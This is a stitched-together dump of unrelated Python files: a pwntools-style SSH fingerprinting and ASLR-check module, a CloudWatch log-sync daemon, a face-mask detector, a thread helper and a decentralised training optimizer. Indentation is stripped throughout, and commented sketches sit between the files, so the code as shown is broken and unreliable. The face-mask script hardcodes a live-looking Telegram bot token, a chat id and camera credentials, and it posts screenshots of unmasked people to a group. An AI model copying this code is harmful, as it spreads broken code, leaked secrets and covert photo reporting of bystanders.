wd, status = self.run_to_end('x=$(mktemp -d) && cd $x && chmod +x . && echo $PWD', wd='.')
wd = wd.strip()
if status:
self.error("Could not generate a temporary directory (%i)\n%s" % (status, wd))
else:
cmd = b'ls ' + sh_string(wd)
_, status = self.run_to_end(cmd, wd = '.')
if status:
self.error("%r does not appear to exist" % wd)
if not isinstance(wd, str):
wd = wd.decode('utf-8')
self.cwd = wd
self.info("Working directory: %r" % self.cwd)
if symlink:
self.ln('-s', symlink, '.')
return wd
def write(self, path, data):
"""Wrapper around upload_data to match :func:`pwnlib.util.misc.write`"""
data = packing._need_bytes(data)
return self.upload_data(data, path)
def read(self, path):
"""Wrapper around download_data to match :func:`pwnlib.util.misc.read`"""
return self.download_data(path)
def _init_remote_platform_info(self):
r"""Fills _platform_info, e.g.:
::
{'distro': 'Ubuntu\n',
'distro_ver': '14.04\n',
'machine': 'x86_64',
'node': 'pwnable.kr',
'processor': 'x86_64',
'release': '3.11.0-12-generic',
'system': 'linux',
'version': '#19-ubuntu smp wed oct 9 16:20:46 utc 2013'}
"""
if self._platform_info:
return
def preexec():
import platform
print('\n'.join(platform.uname()))
with context.quiet:
with self.process('true', preexec_fn=preexec) as io:
self._platform_info = {
'system': io.recvline().lower().strip().decode(),
'node': io.recvline().lower().strip().decode(),
'release': io.recvline().lower().strip().decode(),
'version': io.recvline().lower().strip().decode(),
'machine': io.recvline().lower().strip().decode(),
'processor': io.recvline().lower().strip().decode(),
'distro': 'Unknown',
'distro_ver': ''
}
try:
if not self.which('lsb_release'):
return
with self.process(['lsb_release', '-irs']) as io:
lsb_info = io.recvall().strip().decode()
self._platform_info['distro'], self._platform_info['distro_ver'] = lsb_info.split()
except Exception:
pass
@property
def os(self):
""":class:`str`: Operating System of the remote machine."""
try:
self._init_remote_platform_info()
with context.local(os=self._platform_info['system']):
return context.os
except Exception:
return "Unknown"
@property
def arch(self):
""":class:`str`: CPU Architecture of the remote machine."""
try:
self._init_remote_platform_info()
with context.local(arch=self._platform_info['machine']):
return context.arch
except Exception:
return "Unknown"
@property
def bits(self):
""":class:`str`: Pointer size of the remote machine."""
try:
with context.local():
context.clear()
context.arch = self.arch
return context.bits
except Exception:
return context.bits
@property
def version(self):
""":class:`tuple`: Kernel version of the remote machine."""
try:
self._init_remote_platform_info()
vers = self._platform_info['release']
# 3.11.0-12-generic
expr = r'([0-9]+\.?)+'
vers = re.search(expr, vers).group()
return tuple(map(int, vers.split('.')))
except Exception:
return (0,0,0)
@property
def distro(self):
""":class:`tuple`: Linux distribution name and release."""
try:
self._init_remote_platform_info()
return (self._platform_info['distro'], self._platform_info['distro_ver'])
except Exception:
return ("Unknown", "Unknown")
@property
def aslr(self):
""":class:`bool`: Whether ASLR is enabled on the system.
Example:
>>> s = ssh("travis", "example.pwnme")
>>> s.aslr
True
"""
if self._aslr is None:
if self.os != 'linux':
self.warn_once("Only Linux is supported for ASLR checks.")
self._aslr = False
else:
with context.quiet:
rvs = self.read('/proc/sys/kernel/randomize_va_space')
self._aslr = not rvs.startswith(b'0')
return self._aslr
@property
def aslr_ulimit(self):
""":class:`bool`: Whether the entropy of 32-bit processes can be reduced with ulimit."""
import pwnlib.elf.elf
import pwnlib.shellcraft
if self._aslr_ulimit is not None:
return self._aslr_ulimit
# This test must run a 32-bit binary, fix the architecture
arch = {
'amd64': 'i386',
'aarch64': 'arm'
}.get(self.arch, self.arch)
with context.local(arch=arch, bits=32, os=self.os, aslr=True):
with context.quiet:
try:
sc = pwnlib.shellcraft.cat('/proc/self/maps') \
+ pwnlib.shellcraft.exit(0)
elf = pwnlib.elf.elf.ELF.from_assembly(sc, shared=True)
except Exception:
self.warn_once("Can't determine ulimit ASLR status")
self._aslr_ulimit = False
return self._aslr_ulimit
def preexec():
import resource
try:
resource.setrlimit(resource.RLIMIT_STACK, (-1, -1))
except Exception:
pass
# Move to a new temporary directory
cwd = self.cwd
tmp = self.set_working_directory()
try:
self.upload(elf.path, './aslr-test')
except IOError:
self.warn_once("Couldn't check ASLR ulimit trick")
self._aslr_ulimit = False
return False
self.process(['chmod', '+x', './aslr-test']).wait()
maps = self.process(['./aslr-test'], preexec_fn=preexec).recvall()
# Move back to the old directory
self.cwd = cwd
# Clean up the files
self.process(['rm', '-rf', tmp]).wait()
# Check for 555555000 (1/3 of the address space for PAE)
# and for 40000000 (1/3 of the address space with 3GB barrier)
self._aslr_ulimit = bool(b'55555000' in maps or b'40000000' in maps)
return self._aslr_ulimit
def _checksec_cache(self, value=None):
path = self._get_cachefile('%s-%s' % (self.host, self.port))
if value is not None:
with open(path, 'w+') as f:
f.write(value)
elif os.path.exists(path):
with open(path, 'r+') as f:
return f.read()
def checksec(self, banner=True):
"""checksec()
Prints a helpful message about the remote system.
Arguments:
banner(bool): Whether to print the path to the ELF binary.
"""
cached = self._checksec_cache()
if cached:
return cached
red = text.red
green = text.green
yellow = text.yellow
res = [
"%s@%s:" % (self.user, self.host),
"Distro".ljust(10) + ' '.join(self.distro),
"OS:".ljust(10) + self.os,
"Arch:".ljust(10) + self.arch,
"Version:".ljust(10) + '.'.join(map(str, self.version)),
"ASLR:".ljust(10) + {
True: green("Enabled"),
False: red("Disabled")
}[self.aslr]
]
if self.aslr_ulimit:
res += [ "Note:".ljust(10) + red("Susceptible to ASLR ulimit trick (CVE-2016-3672)")]
cached = '\n'.join(res)
self._checksec_cache(cached)
return cached
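# Hedged usage sketch for the file-transfer and fingerprinting helpers above. It assumes
# pwntools is installed and an SSH server is reachable; the host, user and paths are
# placeholders, not values taken from this module.
from pwn import ssh

def transfer_demo():
    io = ssh(host='example.pwnme', user='travis')
    io.set_working_directory()                     # fresh `mktemp -d` directory, chmod +x
    remote_path = io.upload_file('/etc/hostname')  # lands in the new working directory
    data = io.download_data(remote_path)           # cached locally by sha256 fingerprint
    print(io.checksec())                           # OS / arch / kernel / ASLR summary
    io.close()
    return data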
|
main.py
|
import json
import threading
import time
from threading import Lock
from cloudwatch.config import *
import boto3
from cloudwatch.cwl import CloudWatchLogs
from cloudwatch.consumer_mixpanel import MixpanelConsumer
from cloudwatch.consumer_filesystem import FileSystemConsumer
from cloudwatch.utils import create_file_if_does_not_exist
"""
GLOBALS GO HERE
The log stream map is a discovery mechanism that lets the main process know
which threads are working on which log streams.
Key: tuple(log group name, log stream name); value: the worker thread (optional for now).
Essentially we keep a set of the log streams currently being processed, so entries
can be reaped from this map when a thread is done, and new entries can be added
as more log streams are discovered.
"""
LOG_STREAM_MAP = {}
LOG_STREAM_CHECKPOINT = {} # key = stream id, value = next token to be fetched
s3_client = boto3.client('s3')
class GlobalManager(object):
"""
Helper class to set/get shared state and variables
"""
def __init__(self):
self.lock = Lock()
def get_log_stream_map(self):
self.lock.acquire()
try:
return LOG_STREAM_MAP
finally:
self.lock.release()
def set_log_stream_map(self, key, value):
self.lock.acquire()
try:
logging.info("setting the stream {} to thread {}".format(key, value))
LOG_STREAM_MAP[key] = value
finally:
self.lock.release()
def delete_stream_from_map(self, key):
self.lock.acquire()
try:
if LOG_STREAM_MAP.get(key):
del LOG_STREAM_MAP[key]
finally:
self.lock.release()
def get_checkpoint(self):
self.lock.acquire()
try:
return LOG_STREAM_CHECKPOINT
finally:
self.lock.release()
def set_checkpoint(self, key, value):
self.lock.acquire()
try:
LOG_STREAM_CHECKPOINT[key] = value
finally:
self.lock.release()
gb = GlobalManager()
class LogStreamHandler(object):
def __init__(self, client):
self.aws_client = client
self.lock = Lock()
def write_log(self, log_group_name, log_stream_name, consumers):
"""
Writes the log to the log file
@param file_name: The log file name to be written to
@param log_group_name: The log group name
@param log_stream_name: The log stream name
@param consumers: List of consumers of type BaseConsumer
"""
# get the data from the log group
for _logs in self.aws_client.get_log_events(log_group_name, log_stream_name, gb):
# handle the log events
for _log in _logs:
for consumer in consumers:
consumer.process(_log, log_group_name, log_stream_name)
def _wanted_log_stream(self, log_stream_name):
return True
def _remove_old_streams(self, streams):
"""
Removes any old streams from the LOG_STREAM_MAP
"""
for stream in streams:
    stream_name = stream['logStreamName']
    key = (LOG_GROUP_NAME, stream_name)
    if not gb.get_log_stream_map().get(key):
        logging.warning("CLEANING UP LOG STREAM: {}/{}".format(LOG_GROUP_NAME, stream_name))
        gb.delete_stream_from_map(key)
def _discover_log_streams(self):
"""
This method is used by the main process to discover new log streams
and keep a shared state(map) of the log streams being worked on.
"""
log_streams = self.aws_client.get_log_streams(
log_group_name=LOG_GROUP_NAME, stream_lookback_count=STREAM_LOOKBACK_COUNT)
self._remove_old_streams(log_streams)
for log_stream in log_streams:
lsn = log_stream['logStreamName']
if not gb.get_log_stream_map().get((LOG_GROUP_NAME, lsn)):
# setting the value to None is an indication that no thread is working on the log stream
if self._wanted_log_stream(lsn):
logging.info("Log stream {} not tracked - starting to track".format(lsn))
gb.set_log_stream_map((LOG_GROUP_NAME, lsn), None)
else:
logging.info("Stream {} already being processed".format(log_stream['logStreamName']))
logging.info("Log stream map: {}".format(gb.get_log_stream_map()))
def discover_log_streams(self):
"""
A daemon that continuously looks for log streams
"""
while True:
self._discover_log_streams()
time.sleep(TIME_DAEMON_SLEEP)
def _get_new_log_streams(self):
"""
Reads from the global log stream map to find any new streams that
have not been handled. If so, return those
"""
self.lock.acquire()
new_streams = []
logging.info("Stream map {}".format(gb.get_log_stream_map().items()))
for key, value in gb.get_log_stream_map().items():
if value is None:
new_streams.append(key)
if new_streams:
logging.info("Found new Streams: %s", str(new_streams))
self.lock.release()
return new_streams
def sync_new_logs(self):
"""
Syncs the newly discovered log streams to the file system by starting off
a thread that consumes those logs. Also marks the MAP for those streams as being processed
"""
while True:
new_streams = self._get_new_log_streams()
self.lock.acquire()
logging.info("New streams: {}".format(new_streams))
if not new_streams:
time.sleep(TIME_DAEMON_SLEEP)
for log_group_name, log_stream_name in new_streams:
log_getter = threading.Thread(
target=self.write_log, args=(log_group_name, log_stream_name, consumers))
logging.info("Consuming log stream: %s, %s %s", log_group_name, log_stream_name, log_getter)
gb.set_log_stream_map((log_group_name, log_stream_name), log_getter)
log_getter.start()
self.lock.release()
def persist_state(self, location='cwl.state'):
"""
Persist the checkpoint state (key = stream id, value = next token) to a specific location
:param location: location of the state file. #TODO save to s3 or dynamo later
"""
state = {}
while True:
state['modified_time'] = time.asctime()
state.update(gb.get_checkpoint())
state_json = json.dumps(state)
create_file_if_does_not_exist(location)
with open(location, 'w') as fhandle:
    fhandle.write(state_json)
# with open(location, 'rb') as data:
# s3_client.upload_fileobj(data, 'cloudwatch.mixpanel.state', "{}-state".format(CWL_ENV))
time.sleep(1)
def configure_logging():
"""
Configure the logging
"""
logging.basicConfig(
filename=LOG_FILE,
level=LOG_LEVEL,
format=LOG_FORMAT
)
class LogProcessMonitor(object):
"""
Monitors the processes that write to the logs
"""
def __init__(self):
pass
def log_status(self):
"""
Logs the status of the processes
@param log_stream_map: the global log stream map the main process uses to orchestrate threads
"""
while True:
for _log_group_stream, _processing_thread in gb.get_log_stream_map().items():
logging.info(
"Log Group: {0}, Stream: {1} is processed by: {2}".format(
_log_group_stream[0], _log_group_stream[1], _processing_thread)
)
time.sleep(TIME_DAEMON_SLEEP)
def load_checkpoint():
try:
f = open('cwl.state', 'r')
checkpoint = f.read()
logging.info("checkpoint found")
checkpoint = json.loads(checkpoint)
logging.info("parsed checkpoint is %s", checkpoint)
del checkpoint['modified_time']
for key, value in checkpoint.items():
gb.set_checkpoint(key, value)
except Exception as ex:
logging.warning("No checkpoint found {}".format(repr(ex)))
if __name__ == '__main__':
try:
configure_logging()
client = CloudWatchLogs(AWS_ACCESS_KEY, AWS_SECRET_KEY, AWS_REGION, AWS_SESSION_TOKEN)
logstreamhandler = LogStreamHandler(client)
load_checkpoint()
mp_consumer = MixpanelConsumer()
fs_consumer = FileSystemConsumer()
consumers = []
if MIXPANEL_TOKEN:
consumers.append(mp_consumer)
if AWS_LOGS_DIRECTORY:
consumers.append(fs_consumer)
discover_log_streams_thread = threading.Thread(target=logstreamhandler.discover_log_streams, args=())
logs_getter_thread = threading.Thread(target=logstreamhandler.sync_new_logs, args=())
process_monitor_thread = threading.Thread(target=LogProcessMonitor().log_status, args=())
persist_stream_checkpoint = threading.Thread(target=logstreamhandler.persist_state, args=())
workers = [discover_log_streams_thread, logs_getter_thread, process_monitor_thread, persist_stream_checkpoint]
logging.info("Log stream map %s", gb.get_log_stream_map())
for worker in workers:
worker.daemon = True
worker.start()
while True:
logging.info("Heartbeat")
time.sleep(TIME_DAEMON_SLEEP)
# check the health of threads. restart if they have died and log loudly
for worker in workers:
if not worker.is_alive():
logging.exception(
"!! Worker thread {} died around time {} - restarting it.".format(worker.name, time.asctime())
)
worker.start()
except KeyboardInterrupt as ex:
logging.error("Keyboard interrupt received..")
|
face_mask_auto_ipwebcam.py
|
import cv2
import numpy as np
import os
import PIL
import time
import requests
import tensorflow as tf
import keras
import subprocess
# import screee
import multiprocessing
# from mss import mss
import pickle
labels = ["with_mask", "without_mask"]
url = "http://hjk:005@192.168.43.1:8080/shot.jpg" # replace it with 0 to use system default camera
# path to your model
os.chdir("convv")
model = keras.models.load_model("model.h5")
# path to haar cascade
os.chdir("/home/hemanth/PycharmProjects/face_mask_social_tele/dataa")
face_cascade = cv2.CascadeClassifier("haarcascade_frontalface_default.xml")
"""
def hjk():
print("hii")
#os.system('captureimagecam.py')
"""
def main():
# time.sleep(5)
#import PIL.ImageGrab
#im = PIL.ImageGrab.grab()
#im.save('/home/hemanth/PycharmProjects/face_mask_social_tele/eporting_image/epotingimage.jpg')
# im.show()
# time.sleep(5)
import pyautogui
myScreenshot = pyautogui.screenshot()
myScreenshot.save(r'screenshot1.png')
files = {
'photo': open('screenshot1.png', 'rb')}
resp = requests.post('https://api.telegram.org/bot1661354902:AAF45IAEwKkmiyeyLv6dWxoQbjSWZb7DN-4/sendPhoto?chat_id'
'=-1001422894866&caption=Peoples violating covid protocol by not wearing face mask',
files=files)
# change with your chat id and bot token
print(resp.status_code)
while True:
cap = cv2.VideoCapture(url)
_, img = cap.read()
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(gray, 1.3, 5)
for (x, y, w, h) in faces:
toTest = gray[y:y + h, x:x + w]
toTest = cv2.resize(toTest, (100, 100))
# cv2.imshow("test2", toTest) #shows the cropped image which is sent to cnn (optional)
toTest = toTest.reshape(1, 100, 100, 1)
prediction = model.predict(toTest, verbose=0)
if np.argmax(prediction) == 0:
cv2.rectangle(img, (x, y), (x + w, y + h), (48, 216, 48), 2)
cv2.putText(img, "Mask", (x, y - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.9, (48, 216, 48), 2)
cv2.putText(img, str(round(prediction[0][0] * 100, 2)) + "%", (x, y + h + 30), cv2.FONT_HERSHEY_SIMPLEX,
0.9, (48, 216, 48), 2)
elif np.argmax(prediction) == 1:
cv2.rectangle(img, (x, y), (x + w, y + h), (0, 0, 255), 2)
cv2.putText(img, "No mask", (x, y - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.9, (0, 0, 255), 2)
cv2.putText(img, str(round(prediction[0][1] * 100, 2)) + "%", (x, y + h + 30), cv2.FONT_HERSHEY_SIMPLEX,
0.9, (0, 0, 255), 2)
h = (np.argmax(prediction))
# time.sleep(5)
# print(h)
if h == 1:
if __name__ == '__main__':
main()
# subprocess.run("python screee.py")
# p1 = multiprocessing.Process(name='p1', target=dhjk)
# p1.start()
# os.system('screee.py')
print("nomask")
# time.sleep(3)
# print(tf.gather(labels, np.argmax(prediction)))
#cv2.namedWindow('FACE MASK AUTOMATION', cv2.WINDOW_FREERATIO)
#cv2.setWindowProperty('FACE MASK AUTOMATION ', cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)
hjk2 = cv2.resize(img, (1600, 840))
cv2.imshow("FACE MASK AUTOMATION", hjk2)
if cv2.waitKey(1) & 0xff == ord("q"):
break
cap.release()
cv2.destroyAllWindows()
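# Hedged sketch, not part of the original script: the IP Webcam app serves a single JPEG
# frame at .../shot.jpg, so frames can also be fetched with requests and decoded with
# OpenCV instead of re-creating a cv2.VideoCapture on every loop iteration. The URL is
# a placeholder.
import cv2
import numpy as np
import requests

def grab_frame(shot_url="http://192.168.43.1:8080/shot.jpg", timeout=5):
    """Fetch one frame from an IP Webcam shot.jpg endpoint and return it as a BGR image."""
    resp = requests.get(shot_url, timeout=timeout)
    resp.raise_for_status()
    buf = np.frombuffer(resp.content, dtype=np.uint8)
    return cv2.imdecode(buf, cv2.IMREAD_COLOR)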
|
stoppable_thread.py
|
# Copyright 2015-2021 Espressif Systems (Shanghai) CO LTD
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
try:
from typing import Optional
except ImportError:
pass
class StoppableThread(object):
"""
Provide a Thread-like class which can be 'cancelled' via a subclass-provided
cancellation method.
Can be started and stopped multiple times.
Isn't an instance of type Thread because Python Thread objects can only be run once
"""
def __init__(self):
# type: () -> None
self._thread = None # type: Optional[threading.Thread]
@property
def alive(self):
# type: () -> bool
"""
Is 'alive' whenever the internal thread object exists
"""
return self._thread is not None
def start(self):
# type: () -> None
if self._thread is None:
self._thread = threading.Thread(target=self._run_outer)
self._thread.start()
def _cancel(self):
# type: () -> None
pass # override to provide cancellation functionality
def run(self):
# type: () -> None
pass # override for the main thread behaviour
def _run_outer(self):
# type: () -> None
try:
self.run()
finally:
self._thread = None
def stop(self):
# type: () -> None
if self._thread is not None:
old_thread = self._thread
self._thread = None
self._cancel()
old_thread.join()
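# Hedged example, not part of the original module: a minimal StoppableThread subclass
# whose run() loops until the subclass-provided _cancel() sets an event.
import time

class TickerThread(StoppableThread):
    """Prints a tick roughly once per second until stop() is called."""
    def __init__(self):
        # type: () -> None
        super(TickerThread, self).__init__()
        self._cancel_event = threading.Event()
    def run(self):
        # type: () -> None
        self._cancel_event.clear()
        while not self._cancel_event.wait(1.0):
            print('tick')
    def _cancel(self):
        # type: () -> None
        self._cancel_event.set()
# Example: ticker = TickerThread(); ticker.start(); time.sleep(3); ticker.stop()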
|
collaborative.py
|
from __future__ import annotations
import logging
from dataclasses import dataclass
from threading import Event, Lock, Thread
from typing import Dict, Iterator, Optional
import numpy as np
import torch
from pydantic import BaseModel, StrictBool, StrictFloat, confloat, conint
from hivemind.dht import DHT
from hivemind.dht.crypto import RSASignatureValidator
from hivemind.dht.schema import BytesWithPublicKey, SchemaValidator
from hivemind.optim.base import DecentralizedOptimizerBase
from hivemind.optim.grad_scaler import HivemindGradScaler
from hivemind.optim.training_averager import TrainingAverager
from hivemind.utils import get_dht_time, get_logger
from hivemind.utils.performance_ema import PerformanceEMA
logger = get_logger(__name__)
LRSchedulerBase = getattr(torch.optim.lr_scheduler, "_LRScheduler", None)
@dataclass(frozen=False)
class CollaborationState:
optimizer_step: int
samples_accumulated: int
target_batch_size: int
num_peers: int
num_clients: int
eta_next_step: float
next_fetch_time: float
@property
def ready_for_step(self):
return self.samples_accumulated >= self.target_batch_size or get_dht_time() >= self.eta_next_step
def register_step(self, local_step: int):
self.optimizer_step = max(local_step, self.optimizer_step)
self.samples_accumulated = 0
self.eta_next_step = float("inf")
class TrainingState(BaseModel):
peer_id: bytes
step: conint(ge=0, strict=True)
samples_accumulated: conint(ge=0, strict=True)
samples_per_second: confloat(ge=0.0, strict=True)
time: StrictFloat
client_mode: StrictBool
class TrainingProgressSchema(BaseModel):
progress: Dict[BytesWithPublicKey, Optional[TrainingState]]
class CollaborativeOptimizer(DecentralizedOptimizerBase):
"""
An optimizer that performs model updates after collaboratively accumulating a target (large) batch size across peers.
These optimizers use the DHT to track how much progress the collaboration has made towards the target batch size.
Once enough samples have been accumulated, the optimizers compute a weighted average of their statistics.
:note: **For new projects, please use hivemind.Optimizer**. CollaborativeOptimizer is an older version of that.
Currently, hivemind.Optimizer supports all the features of CollaborativeOptimizer and many advanced ones.
CollaborativeOptimizer will still be supported for a while, but it will be deprecated in v1.1.0.
:note: This optimizer behaves unlike regular pytorch optimizers in two ways:
* calling .step will periodically zero-out gradients w.r.t. model parameters after each step
* it may take multiple .step calls without updating model parameters, waiting for peers to accumulate enough samples
:param opt: a standard pytorch optimizer, preferably a large-batch one such as LAMB, LARS, etc.
:param dht: a running hivemind.DHT daemon connected to other peers
:param prefix: a common prefix for all metadata stored by CollaborativeOptimizer in the DHT
:param target_batch_size: perform optimizer step after all peers collectively accumulate this many samples
:param batch_size_per_step: before each call to .step, user should accumulate gradients over this many samples
:param min_refresh_period: wait for at least this many seconds before fetching new collaboration state
:param max_refresh_period: wait for at most this many seconds before fetching new collaboration state
:param default_refresh_period: if no peers are detected, attempt to fetch collaboration state this often (seconds)
:param expected_drift_peers: assume that this many new peers can join between steps
:param expected_drift_rate: assumes that this fraction of current collaboration can join/leave between steps
:note: The expected collaboration drift parameters are used to adjust the frequency with which this optimizer will
refresh the collaboration-wide statistics (to avoid missing the moment when to run the next step)
:param bandwidth: peer's network bandwidth for the purpose of load balancing (recommended: internet speed in mbps)
:param step_tolerance: a peer can temporarily be delayed by this many steps without being deemed out of sync
:param performance_ema_alpha: smoothing value used to estimate this peer's performance (training samples per second)
:param averaging_expiration: peer's requests for averaging will be valid for this many seconds
:param metadata_expiration: peer's metadata (e.g. samples processed) is stored onto DHT for this many seconds
:param averaging_timeout: if an averaging step hangs for this long, it will be cancelled.
:param load_state_timeout: wait for at most this many seconds before giving up on load_state_from_peers
:param scheduler: if specified, use this scheduler to update optimizer learning rate
:param reuse_grad_buffers: if True, use model's .grad buffers for gradient accumulation.
This is more memory efficient, but it requires that the user does *NOT* call model/opt zero_grad at all
:param accumulate_grads_on: if specified, accumulate gradients on this device. By default, this will use the same
device as model parameters. One can specify a different device (e.g. 'cpu' vs 'cuda') to save device memory at
the cost of extra time per step. If reuse_gradient_accumulators is True, this parameter has no effect.
:param client_mode: if True, runs training without incoming connections, in a firewall-compatible mode
:param kwargs: additional parameters forwarded to DecentralizedAverager
:note: If you are using CollaborativeOptimizer with lr_scheduler, it is recommended to pass this scheduler
explicitly into this class. Otherwise, scheduler may not be synchronized between peers.
"""
def __init__(
self,
opt: torch.optim.Optimizer,
*,
dht: DHT,
prefix: str,
target_batch_size: int,
batch_size_per_step: Optional[int] = None,
scheduler: Optional[LRSchedulerBase] = None,
min_refresh_period: float = 0.5,
max_refresh_period: float = 30,
default_refresh_period: float = 3,
expected_drift_peers: float = 3,
expected_drift_rate: float = 0.2,
performance_ema_alpha: float = 0.1,
metadata_expiration: float = 60.0,
averaging_timeout: Optional[float] = None,
load_state_timeout: float = 600.0,
step_tolerance: int = 1,
reuse_grad_buffers: bool = False,
accumulate_grads_on: Optional[torch.device] = None,
client_mode: bool = False,
verbose: bool = False,
**kwargs,
):
super().__init__(opt, dht)
signature_validator = RSASignatureValidator()
self._local_public_key = signature_validator.local_public_key
dht.add_validators([SchemaValidator(TrainingProgressSchema, prefix=prefix), signature_validator])
if reuse_grad_buffers and accumulate_grads_on is not None:
logger.warning("Setting 'accumulate_grads_on' has no effect if reuse_grad_buffers=True")
self.prefix, self.scheduler = prefix, scheduler
self.target_batch_size, self.batch_size_per_step = target_batch_size, batch_size_per_step
self.min_refresh_period, self.max_refresh_period, self.default_refresh_period = (
min_refresh_period,
max_refresh_period,
default_refresh_period,
)
self.expected_drift_peers, self.expected_drift_rate = expected_drift_peers, expected_drift_rate
self.averaging_timeout = averaging_timeout
self.load_state_timeout = load_state_timeout
self.metadata_expiration = metadata_expiration
self._grads, self.reuse_grad_buffers, self.accumulate_grads_on = None, reuse_grad_buffers, accumulate_grads_on
self.client_mode, self.step_tolerance = client_mode, step_tolerance
self.status_loglevel = logging.INFO if verbose else logging.DEBUG
self.averager = self._make_averager(**kwargs)
self._step_supports_amp_scaling = self.reuse_grad_buffers # enable custom execution with torch GradScaler
self.training_progress_key = f"{self.prefix}_progress"
self.local_samples_accumulated = 0 # a number of local samples accumulated since last optimizer update
self.local_updates_accumulated = 0 # a number of calls to step() since last optimizer update
self.performance_ema = PerformanceEMA(alpha=performance_ema_alpha)
self.last_step_time = None
self.collaboration_state = self._fetch_state()
self.lock_collaboration_state, self.collaboration_state_updated = Lock(), Event()
self.lock_local_progress, self.should_report_progress = Lock(), Event()
self.progress_reporter = Thread(target=self.report_training_progress, daemon=True, name=f"{self}.reporter")
self.progress_reporter.start()
self.collaboration_state_updater = Thread(
target=self.check_collaboration_state_periodically, daemon=True, name=f"{self}.collaboration_state_updater"
)
self.collaboration_state_updater.start()
def _make_averager(self, **kwargs):
return TrainingAverager(
self.opt,
dht=self.dht,
average_parameters=True,
average_gradients=True,
prefix=f"{self.prefix}_averaging",
allreduce_timeout=self.averaging_timeout,
client_mode=self.client_mode,
**kwargs,
)
@property
def local_step(self) -> int:
return self.averager.local_step
@property
def is_synchronized(self) -> bool:
return self.local_step >= self.collaboration_state.optimizer_step
@property
def is_within_tolerance(self) -> bool:
return self.local_step >= self.collaboration_state.optimizer_step - self.step_tolerance
def is_alive(self) -> bool:
return self.averager.is_alive()
def load_state_from_peers(self, **kwargs):
"""Attempt to fetch the newest collaboration state from other peers"""
with self.lock_collaboration_state:
while True:
try:
self.averager.load_state_from_peers(timeout=self.load_state_timeout, **kwargs)
break
except KeyboardInterrupt:
raise
except BaseException as e:
logger.exception(f"Failed to load state from peers: {e}, retrying ...")
continue
self.local_samples_accumulated = self.local_updates_accumulated = 0
self.reset_accumulated_grads_()
self.update_scheduler()
def state_dict(self) -> dict:
state_dict = super().state_dict()
state_dict["state"]["collaborative_step"] = self.local_step
return state_dict
def load_state_dict(self, state_dict: dict):
if "collaborative_step" in state_dict["state"]:
self.averager.local_step = state_dict["state"].pop("collaborative_step")
return super().load_state_dict(state_dict)
def step(self, batch_size: Optional[int] = None, grad_scaler: Optional[HivemindGradScaler] = None, **kwargs):
"""
Report accumulating gradients w.r.t. batch_size additional samples, optionally update model parameters
:param batch_size: optional override for batch_size_per_step from init
:param grad_scaler: if amp is enabled, this **must** be a hivemind-aware gradient scaler
:note: this .step is different from normal pytorch optimizers in several key ways. See __init__ for details.
"""
if grad_scaler is not None and not isinstance(grad_scaler, HivemindGradScaler):
raise ValueError("CollaborativeOptimizer requires a hivemind-aware gradient scaler (HivemindGradScaler)")
if self.batch_size_per_step is None:
if batch_size is None:
raise ValueError("Please either set batch_size_per_step parameter at init or when calling .step")
logger.log(self.status_loglevel, f"Setting default batch_size_per_step to {batch_size}")
self.batch_size_per_step = batch_size
batch_size = batch_size if batch_size is not None else self.batch_size_per_step
if not self.is_synchronized and not self.is_within_tolerance:
logger.log(self.status_loglevel, "Peer is out of sync")
self.load_state_from_peers()
return
elif not self.is_synchronized and self.is_within_tolerance:
self.averager.local_step = self.collaboration_state.optimizer_step
logger.log(self.status_loglevel, f"Catching up with collaboration step {self.local_step}")
if grad_scaler is not None and not grad_scaler.are_grads_finite(self):
logger.log(self.status_loglevel, "Encountered incorrect value in fp16 grads, resetting local gradients")
self.local_samples_accumulated = self.local_updates_accumulated = 0
self.reset_accumulated_grads_()
self.should_report_progress.set()
return
if self.last_step_time is not None and get_dht_time() - self.last_step_time > self.metadata_expiration:
logger.warning(
f"Training step took {get_dht_time() - self.last_step_time}, "
f"but metadata expired in {self.metadata_expiration} s."
)
self.accumulate_grads_(batch_size)
with self.lock_local_progress:
self.local_samples_accumulated += batch_size
self.local_updates_accumulated += 1
self.performance_ema.update(task_size=batch_size)
self.should_report_progress.set()
if not self.collaboration_state.ready_for_step:
return
logger.log(self.status_loglevel, f"Beginning global optimizer step #{self.collaboration_state.optimizer_step}")
with self.performance_ema.pause(), self.lock_collaboration_state:
self.collaboration_state = self._fetch_state()
self.collaboration_state_updated.set()
# divide accumulators by local steps to recover the true average grad w.r.t. local_samples_accumulated
self.apply_accumulated_grads_(scale_by=1.0 / self.local_updates_accumulated)
if grad_scaler is not None:
with grad_scaler.running_global_step():
assert grad_scaler.unscale_(self)
current_step, group_info = self.averager.local_step, None
if self.collaboration_state.num_peers > 1:
mean_samples_per_worker = self.target_batch_size / self.collaboration_state.num_peers
weight = self.local_samples_accumulated / mean_samples_per_worker
try:
group_info = self.averager.step(
weight=weight, gather=current_step, timeout=self.averaging_timeout, **kwargs
)
if group_info:
logger.log(self.status_loglevel, f"Averaged tensors successfully with {len(group_info)} peers")
# update our current step if we averaged with another peer that was at a more recent step
for peer, peer_step in group_info.items():
if isinstance(peer_step, int):
current_step = max(current_step, peer_step)
else:
logger.warning(f"Peer {peer} sent malformed data about current step: {peer_step}")
except BaseException as e:
logger.log(self.status_loglevel, f"Skipped averaging: averaging round failed with {repr(e)}")
else:
logger.log(
self.status_loglevel,
f"Skipped averaging: collaboration consists of " f"{self.collaboration_state.num_peers} peer(s)",
)
if grad_scaler is not None:
with grad_scaler.running_global_step():
assert grad_scaler.step(self)
else:
self.opt.step()
self.reset_accumulated_grads_()
self.local_samples_accumulated = self.local_updates_accumulated = 0
self.collaboration_state.register_step(current_step + 1)
self.averager.local_step = current_step + 1
self.collaboration_state_updated.set()
self.update_scheduler()
if grad_scaler is not None:
with grad_scaler.running_global_step():
assert grad_scaler.update()
if not self.averager.client_mode:
self.averager.state_sharing_priority = self.local_step
logger.log(self.status_loglevel, f"Optimizer step: done!")
return group_info
def step_aux(self, **kwargs):
"""
Find and assist other peers in averaging without sending local gradients.
:note: this .step is different from normal pytorch optimizers in several key ways. See __init__ for details.
"""
if not self.collaboration_state.ready_for_step:
return
